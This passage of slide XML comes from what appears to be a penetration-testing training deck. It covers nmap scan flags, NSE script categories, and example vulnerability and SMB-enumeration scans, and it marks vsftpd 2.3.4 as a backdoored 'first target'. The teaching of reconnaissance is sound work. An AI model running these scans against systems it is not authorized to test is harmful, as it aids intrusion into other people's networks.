        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>HOW DEEP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6428232" y="2066544"/>
            <a:ext cx="5029200" cy="1463040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-sV              V for version: what runs there</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-O               guess the operating system</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-A               all of it at once, slow and loud</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="3867912"/>
            <a:ext cx="5440680" cy="2103120"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3043"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="4050792"/>
            <a:ext cx="4846320" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>HOW FAST</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="4398264"/>
            <a:ext cx="5029200" cy="1463040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-T4              a sensible default</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-Pn              n for no ping: scan it anyway</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-n               do not stop for DNS lookups</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="3867912"/>
            <a:ext cx="5440680" cy="2103120"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3043"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6428232" y="4050792"/>
            <a:ext cx="4846320" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>KEEPING IT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6428232" y="4398264"/>
            <a:ext cx="5029200" cy="1463040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-oA scan         A for all: writes three file formats</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-v               show progress while it runs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="6263640"/>
            <a:ext cx="11064240" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1820"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>If you remember only two, remember -sV and -oA. Six weeks later somebody will ask what was open on that host.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="13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02 / SCANNING</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NSE: nmap does more than find ports</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20</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 0" descr="img/t_nse.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1481328"/>
            <a:ext cx="6675120" cy="3227832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="1554480"/>
            <a:ext cx="4087368" cy="2926080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Over 600 scripts ship with nmap, written in Lua</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Categories: auth, brute, default, discovery, exploit, safe, version, vuln</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>They live in /usr/share/nmap/scripts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nmap --script-help ftp-anon explains any of them</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="4937760"/>
            <a:ext cx="11091672" cy="1019747"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5380"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1338"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694944" y="5074920"/>
            <a:ext cx="10799064" cy="745427"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1813"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>$ nmap --script smb-os-discovery,smb-enum-shares -p445 TARGET</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1813"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>$ nmap --script vuln TARGET            # everything nmap knows how to check</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1813"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t># careful: the exploit and brute categories are not safe to run on production</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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02 / SCANNING</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Reading the output</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21</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 0" descr="img/t_nmap_short.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1965960"/>
            <a:ext cx="5074920" cy="3803904"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5897880" y="1572768"/>
            <a:ext cx="5742432" cy="1024128"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6250"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6153912" y="1691640"/>
            <a:ext cx="5303520" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>vsftpd 2.3.4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6153912" y="2011680"/>
            <a:ext cx="5303520" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A specific version with a public backdoor. This is your first target.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5897880" y="2743200"/>
            <a:ext cx="5742432" cy="1024128"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6250"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6153912" y="2862072"/>
            <a:ext cx="5303520" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>OpenSSH 4.7p1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6153912" y="3182112"/>
            <a:ext cx="5303520" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
